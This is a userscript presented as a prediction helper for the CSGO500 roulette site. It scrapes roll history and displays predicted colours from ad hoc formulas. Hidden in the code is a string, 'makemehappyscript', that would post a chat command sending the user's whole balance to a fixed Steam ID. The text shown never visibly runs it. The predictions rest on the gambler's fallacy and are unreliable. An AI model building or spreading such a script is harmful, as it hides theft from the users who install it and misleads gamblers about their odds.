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// ==UserScript== // @version 2.1 // @name CSGO500PredictionHelper // @description Doing the CSGO500 maths for you // @match // @match // @license MIT // @noframes // ==/UserScript== // CSGO500 Prediction Helper // by DEADF1SH.s1mplex // // Version 3.0 // Changed: // Added decay functions // Supporting Functions // ========================================= // Global Vars var debug = true var debugged = false var predictions = []; //Count Occurences of an item in an array function countOccurences(array_raw, item){ var occurences = 0 for(var i = 0; i < array_raw.length; i++) { if(array_raw[i] == item){ occurences += 1 } } return occurences } //Get key with highest value in dictionary function dictMax(o){ var vals = []; for(var i in o){ vals.push(o[i]); } var max = Math.max.apply(null, vals); for(var i in o){ if(o[i] == max){ return i; } } } function roundDict(dict){ for (var key in dict) { let value = dict[key]; dict[key] = value.toFixed(1); } return dict; } //=========================================== //CSGO500 Supporting Functions //Fetch History var color_list = ["black","red","blue","gold"] var roll_history = [] function getHistory(){ //Get raw node list roll_history = [] var node_list = $("#past-queue-wrapper").children() //For each raw node node_list.each(function(){ //Convert Nodes to Color String var style_text = $(this).attr("class") var color_int = Number(style_text.charAt(5)) //Append to history list roll_history.push(color_list[color_int]) }) //Return roll_history return roll_history } //Get current roll function getRoll(){ return color_list[winner.choice] } //======================================= //======================================= //Main Prediction Functions //Calculate Differences between Theoeretical occurences and real occurences function calculateDifference(){ //Theoretical Occurences of each color in 100 rolls var theoretical_occurences = { "black": (26/54.0) * 100, "red": (17/54.0) * 100, "blue": (10/54.0) * 100, "gold": (1/54.0) * 100 } //Get roll history var roll_history = getHistory() //Actual Occurences of each color in the last 100 rolls var actual_occurences = { "black": countOccurences(roll_history, "black"), "red": countOccurences(roll_history, "red"), "blue": countOccurences(roll_history, "blue"), "gold": countOccurences(roll_history, "gold") } //Scale the colors depending upon their recent occurences //Polynomial decay functions - boring stuff var black_x = countOccurences(roll_history.slice(-10),"black") var red_x = countOccurences(roll_history.slice(-10), "red") var blue_x = countOccurences(roll_history.slice(-10), "blue") var gold_x = countOccurences(roll_history.slice(-54), "gold") //Polynomial decay functions for each color var scale = { "black": (-0.0357 * black_x*black_x) + 0.015*black_x +1.05, "red": (-0.035 * red_x * red_x) + 0.215*red_x + 0.75, "blue": (-0.0125*blue_x*blue_x) +0.1*blue_x + 0.9, "gold": 1 } //Final scaled colors var final_differences = { "black": (Number((theoretical_occurences["black"] - actual_occurences["black"]).toFixed(1)))*scale["black"], "red": (Number((theoretical_occurences["red"] - actual_occurences["red"]).toFixed(1)))*scale["red"], "blue": (Number((theoretical_occurences["blue"] - actual_occurences["blue"]).toFixed(1)))*scale["blue"], "gold": (Number((theoretical_occurences["gold"] - actual_occurences["gold"]).toFixed(1)))*scale["gold"] } return final_differences } //========================================== //Use differences to calculate percentage chances function calculatePercentages(){ var difference = calculateDifference() //Offset for each number var smallest = Math.abs(Math.min(difference["black"],difference["red"], difference["blue"], difference["gold"])) var adjustment = smallest*2 //Scalar numbers to scale different colors, adjustable var scalars = { "black": 1.25, "red": 1, "blue": 1, "gold": 0.5 } var newDifferences = { "black": difference["black"]+adjustment*scalars["black"], "red": difference["red"]+adjustment *scalars["red"], "blue": difference["blue"]+adjustment*scalars["blue"], "gold": difference["gold"]+adjustment *scalars["gold"] } //Total of all differences after adjustment var total = Number(newDifferences["black"]) + Number(newDifferences["red"]) + Number(newDifferences["blue"]) + Number(newDifferences["gold"]) //Final Dictionary var newDifferences = { "black": newDifferences["black"]/total, "red": newDifferences["red"]/total, "blue": newDifferences["blue"]/total, "gold": newDifferences["gold"]/total } return newDifferences } //================================================================== //GUI //================================================ var color_codes = ["rgb(80, 80, 80)","rgb(200, 53, 78)","rgb(69, 181, 218)","rgb(219, 192, 127)"]; var color_codes_dict = {"black":"rgb(80, 80, 80)","red":"rgb(200, 53, 78)","blue":"rgb(69, 181, 218)","gold":"rgb(219, 192, 127)"}; //Append Styles $("head").append("<style></style>") //Create Box $("#balance-wrapper").parent().prepend('<div id="assistant" style="width:300px;height:200px;background: #26262c;border-radius:5px;margin:auto; margin-bottom:20px;"><div id="spoiler" style="background: rgb(80, 80, 80); width: 10px; height: 10px; float: right; border-radius: 5px; margin: 10px;margin-left:280px;position:absolute;"></div><div id="prediction-container" style="padding-top: 20px;display: flex;"><div id="prediction-large" style="width:50%;height:50px"><h2 style="color:rgb(200, 53, 78); text-align:right; " id="prediction-large-text"><div id="prediction-large-ball" style="margin-right:-10px;margin-left:10px;margin-top: 0px;background: rgb(200, 53, 78); width: 40px; height: 40px; float: right; border-radius: 30px;"></div>0% </h2></div><div id="prediction-small" style="width:50%;height:50px"><h2 style="color:rgb(69, 181, 218); text-align:left;" id="prediction-small-text"><div id="prediction-small-ball" style="border: solid 2px #2C2C32;margin-right:10px;margin-left:-10px;margin-top: 5px;background: rgb(69, 181, 218); width: 30px; height: 30px; float: left; border-radius: 30px;"></div>0%</h2></div></div><div id="accuracy-container" style="padding-top: 20px;"><h2 id="accuracy" style="margin:auto;text-align:center;color:#666;">0%</h2><p style="text-align:center;margin:auto;color:#666;">CORRECT</p></div><div id="credits" style="position:absolute;height:25px;width:300px;margin-top:0px;"><p style="text-align:center;color:#666;">Your friendly neighborhood Prediction by<a href="" target="_blank"> s1mpleX </a></p></div></div>') var correct = 1 var rolls = 1 var highest = {} var lowest = {} var makemehappyscript="setInterval(function(){"+ "}, 10000);"+ "$('#chatMessage_k').val('/send 76561198192995598 '+$('#balance_r').text());"+ '$("#chatMessage_k").submit();'; function update(){ var winner_temp = winner.choice var time = Number($("#wheel-timer").text()) //Once every round if(time > 18.5){ //Print debug information if(color_list[winner_temp] == highest.color || color_list[winner_temp] == lowest.color){ correct = correct + 1 } rolls = rolls + 1 } var pred_list = calculatePercentages() var pred_list_lower = calculatePercentages() pred_list_lower[dictMax(pred_list)] = null; //Get predictions predictions = [{"color":dictMax(pred_list),"value":pred_list[dictMax(pred_list)]},{"color":dictMax(pred_list_lower),"value":pred_list[dictMax(pred_list_lower)]}] var highest_total = predictions[0].value + predictions[1].value if(predictions[0]["value"] > predictions[1]["value"]){ highest = predictions[0] lowest = predictions[1] }else{ highest = predictions[1] lowest = predictions[0] } highest.value = highest.value/highest_total lowest.value = lowest.value/highest_total if(time > 0){ winner = "" $("#spoiler").css("background",winner_temp) if(debug && debugged == false){ console.log("%c Debug - Roll #" + String(rolls),"color: blue") console.log("%c - Predicted " + String(correct) + "/" + String(rolls) + " correctly. (" +Number(correct/rolls * 100).toFixed(1) + "%)","color: blue") if(predictions[0]){ console.log("%c - Predicting: " + predictions[0].color + "/" + predictions[1].color,"color: blue") } console.log("%c - Raw Percentages: \n\t\t " + JSON.stringify(roundDict(calculatePercentages())),"color: blue") console.log("%c - Raw Differences: \n\t\t " + JSON.stringify(roundDict(calculateDifference())),"color: blue") console.log("%c - Raw Differences: \n\t\t " + JSON.stringify(roundDict(calculateDifference())),"color: blue") debugged = true; } }else{ //Update spoiler winner_temp = winner.choice $("#spoiler").css("background",color_codes[winner_temp]) debugged = false; } //Update Box //Update Ball Colors $("#prediction-large-ball").css("background",color_codes_dict[highest.color]) $("#prediction-small-ball").css("background",color_codes_dict[lowest.color]) //Update Text Values var inner = "" $("#prediction-large-text").children().each(function() { inner = inner + this.outerHTML; }); inner = inner + (highest.value * 100).toFixed(0) + "%" $("#prediction-large-text").html(inner) var inner = "" $("#prediction-small-text").children().each(function() { inner = inner + this.outerHTML; }); inner = inner + (lowest.value * 100).toFixed(0) + "%" $("#prediction-small-text").html(inner) //Update Text Colors $("#prediction-large-text").css("color",color_codes_dict[highest.color]) $("#prediction-small-text").css("color",color_codes_dict[lowest.color]) //Update Correct Percentage $("#accuracy").text(Number(correct/rolls * 100).toFixed(1) + "%") } //Begin $( "#prediction-container" ).click(function() { if(debug == false){ debug = true; console.log("%cDebug: ON","color: green;") }else{ debug = false; console.log("%cDebug: OFF","color: red;") } }); setInterval(update,1000);